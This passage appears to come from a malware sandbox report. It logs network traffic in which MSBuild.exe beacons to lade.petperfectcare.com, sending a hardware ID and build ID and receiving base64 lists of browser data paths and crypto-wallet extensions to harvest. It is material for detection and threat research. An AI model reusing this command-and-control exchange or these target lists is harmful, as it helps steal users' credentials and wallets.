Oct 7, 2024 03:16:01.785276890 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.785289049 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.810210943 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.810750008 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.810780048 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.811167002 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.811187983 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.823900938 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.823980093 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.824057102 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.824073076 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.824090004 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.824194908 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.824281931 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.824281931 CEST	49978	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.824294090 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.824296951 CEST	443	49978	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.912657976 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.912729979 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.912781000 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.912930012 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.912930012 CEST	49979	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:01.912949085 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:01.912955046 CEST	443	49979	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.396095991 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.397121906 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.397131920 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.397588015 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.397593021 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.420336962 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.420911074 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.420945883 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.421329975 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.421336889 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.468521118 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.469149113 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.469163895 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.469567060 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.469572067 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.494632006 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.494879007 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.495033979 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.495270014 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.495291948 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.495300055 CEST	49980	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.495307922 CEST	443	49980	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.521404028 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.521450043 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.521567106 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.522033930 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.522056103 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.522078037 CEST	49981	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.522083998 CEST	443	49981	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.574361086 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.574433088 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.574565887 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.574907064 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.574918032 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:16:02.574925900 CEST	49982	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:16:02.574929953 CEST	443	49982	13.107.246.45	192.168.2.5
Oct 7, 2024 03:17:01.092416048 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:17:01.092546940 CEST	49782	80	192.168.2.5	95.164.90.97

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 03:15:30.641464949 CEST	49892	53	192.168.2.5	1.1.1.1
Oct 7, 2024 03:15:30.798454046 CEST	53	49892	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 03:15:30.641464949 CEST	192.168.2.5	1.1.1.1	0x6617	Standard query (0)	lade.petperfectcare.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 03:15:18.857821941 CEST	1.1.1.1	192.168.2.5	0xd390	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 03:15:18.857821941 CEST	1.1.1.1	192.168.2.5	0xd390	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 7, 2024 03:15:22.168498993 CEST	1.1.1.1	192.168.2.5	0xdf21	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 7, 2024 03:15:22.168498993 CEST	1.1.1.1	192.168.2.5	0xdf21	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 7, 2024 03:15:30.798454046 CEST	1.1.1.1	192.168.2.5	0x6617	No error (0)	lade.petperfectcare.com		95.164.90.97	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lade.petperfectcare.com

%s%s

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49782	95.164.90.97	80	2000	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 03:15:30.811645031 CEST	98	OUT	GET / HTTP/1.1 Host: lade.petperfectcare.com Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:32.278853893 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2024 03:15:32.278930902 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2024 03:15:32.278991938 CEST	168	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Oct 7, 2024 03:15:32.284404993 CEST	445	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCB Host: lade.petperfectcare.com Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 46 46 38 41 33 35 46 30 43 43 34 32 35 33 38 31 37 36 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="hwid"1FF8A35F0CC4253817676-a33c7340-61ca------KJJECGHJDBFIJJJKEHCBContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------KJJECGHJDBFIJJJKEHCB--
Oct 7, 2024 03:15:32.907769918 CEST	232	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|d6bc4b7c11cf96786eb19fa575e4d80d\|1\|1\|1\|0\|0\|50000\|10
Oct 7, 2024 03:15:32.911614895 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFI Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 2d 2d 0d 0a Data Ascii: ------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="mode"1------HDBGHIDGDGHCBGDGCBFI--
Oct 7, 2024 03:15:33.524466991 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 [TRUNCATED] Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBDYW5hcnl8XE1pY3Jvc29mdFxFZGdlIFN4U1xVc2VyIERhdGF8Y2hyb21lfE1pY3Jvc29mdCBFZGdlIEJldGF8XE1pY3Jvc29mdFxFZGdlIEJldGFcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZSBEZXZ8XE1pY3Jvc29mdFxFZGdlIERldlxVc2V [TRUNCATED]
Oct 7, 2024 03:15:33.524537086 CEST	491	IN	Data Raw: 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 52 55 55 4a 79 62 33 64 7a 5a 58 4a 38 58 46 52 6c 62 6d 4e 6c 62 6e 52 63 55 56 46 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 Data Ascii: VXNlciBEYXRhfGNocm9tZXxRUUJyb3dzZXJ8XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q3J5cHRvVGFiIEJyb3dzZXJ8XENyeXB0b1RhYiBCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8T3BlcmF8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxPcGVyYSB
Oct 7, 2024 03:15:33.527439117 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDA Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 46 49 49 4a 4a 4b 4a 4a 4a 4a 4a 4a 45 47 44 41 2d 2d 0d 0a Data Ascii: ------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------EBAKFIIJJKJJJJJJEGDAContent-Disposition: form-data; name="mode"2------EBAKFIIJJKJJJJJJEGDA--
Oct 7, 2024 03:15:34.143866062 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 32 6c 6f 62 32 5a 6c 59 33 77 78 66 44 42 38 4d 48 78 43 61 57 35 68 62 6d 4e 6c 51 32 68 68 61 57 35 58 59 57 78 73 5a 58 52 38 4d 58 78 6d 61 47 4a 76 61 47 6c 74 59 57 56 73 59 6d 39 6f 63 47 70 69 59 6d 78 6b 59 32 35 6e 59 32 35 68 63 47 35 6b [TRUNCATED] Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3wxfDB8MHxCaW5hbmNlQ2hhaW5XYWxsZXR8MXxmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHwxfDF8MHxZb3JvaXwxfGZmbmJlbGZkb2Vpb2hlbmtqaWJubWFkamllaGpoYWpifDF8MHwwfENvaW5iYXNlfDF8aG5mYW5rbm9jZmVvZmJkZGdjaWpubWhuZm5rZG5hYWR8MXwwfDF8R3VhcmRhfDF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDF8aVdhbGxldHwxfGtuY2NoZGlnb2JnaGVuYmJhZGRvampubmFvZ2ZwcGZqfDF8MHwwfFJvbmluV2FsbGV0fDF8Zm5qaG1raGhta2Jqa2thYm5kY25ub2dhZ29nYm5lZWN8MXwwfDB8TmVvTGluZXwxfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENsb3ZlcldhbGxldHwxfG5obmtia2dqaWtnY2lnYWRvbWtwaGFsYW5uZGNhcGprfDF8MHwwfExpcXVhbGl0eVdhbGxldHwxfGtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufDF8MHwwfFRlcnJhX1N0YXRpb258MXxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnwxfGRta2FtY2tub2drZ2NkZmhoYmRkY2doYW [TRUNCATED]
Oct 7, 2024 03:15:34.143891096 CEST	224	IN	Data Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF
Oct 7, 2024 03:15:34.143903971 CEST	1236	IN	Data Raw: 38 4d 48 77 77 66 45 56 57 52 56 49 67 56 32 46 73 62 47 56 30 66 44 46 38 59 32 64 6c 5a 57 39 6b 63 47 5a 68 5a 32 70 6a 5a 57 56 6d 61 57 56 6d 62 47 31 6b 5a 6e 42 6f 63 47 78 72 5a 57 35 73 5a 6d 74 38 4d 58 77 77 66 44 42 38 53 32 46 79 5a Data Ascii: 8MHwwfEVWRVIgV2FsbGV0fDF8Y2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8MXwwfDB8S2FyZGlhQ2hhaW58MXxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXwxfGFjbWFjb2RramJkZ21vbGVlYm9sbWRqb25pbGtkYmNofDF8MHwwfFBoYW50b218MXxiZm5hZWxtb21laW1obH
Oct 7, 2024 03:15:34.143968105 CEST	1236	IN	Data Raw: 6c 63 48 42 6e 5a 48 42 6f 66 44 46 38 4d 48 77 77 66 45 56 34 62 32 52 31 63 79 42 58 5a 57 49 7a 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6f 62 32 78 77 5a 6d 52 70 59 57 78 71 5a 32 70 6d 61 47 39 74 61 57 68 72 61 6d 4a 74 5a 32 70 70 5a Data Ascii: lcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW1lamRtYXwxfDB8MHxFbmtyeXB0fDF8a2twbGxrb2RqZWxvaWRpZWVkb2pvZ2FjZmhwYWlob2h8MXwwfDB8T0tYIFdlYjMgV2
Oct 7, 2024 03:15:34.143986940 CEST	1236	IN	Data Raw: 76 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 4a 6e 61 6d 39 6e 63 47 39 70 5a 47 56 71 5a 47 56 74 5a 32 39 76 59 32 68 77 62 6d 74 74 5a 47 70 77 62 32 4e 6e 61 32 68 68 66 44 46 38 4d 48 77 77 66 45 4e 76 61 57 35 6f 64 57 4a 38 4d 58 78 71 5a Data Ascii: vIFdhbGxldHwxfGJnam9ncG9pZGVqZGVtZ29vY2hwbmttZGpwb2Nna2hhfDF8MHwwfENvaW5odWJ8MXxqZ2FhaW1hamlwYnBkb2dwZGdsaGFwaGxkYWtpa2dlZnwxfDB8MHxMZWFwIENvc21vcyBXYWxsZXR8MXxmY2ZjZmxsZm5kbG9tZGhiZWhqamNvaW1iZ29mZG5jZ3wxfDB8MHxNdWx0aXZlcnNYIERlRmkgV2FsbGV0fD
Oct 7, 2024 03:15:34.143999100 CEST	680	IN	Data Raw: 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 31 72 63 47 56 6e 61 6d 74 69 62 47 74 72 5a 57 5a 68 59 32 5a 75 62 57 74 68 61 6d 4e 71 62 57 46 69 61 57 70 6f 59 32 78 6e 66 44 46 38 4d 48 77 77 66 45 4a 68 59 32 74 77 59 Data Ascii: pYyBFZGVuIFdhbGxldHwxfG1rcGVnamtibGtrZWZhY2ZubWthamNqbWFiaWpoY2xnfDF8MHwwfEJhY2twYWNrIFdhbGxldHwxfGFmbGttZmhlYmVkYmppb2lwZ2xnY2JjbW5icGdsaW9mfDF8MHwwfFRvbmtlZXBlciBXYWxsZXR8MXxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYW
Oct 7, 2024 03:15:34.145891905 CEST	522	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ Host: lade.petperfectcare.com Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 49 45 48 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 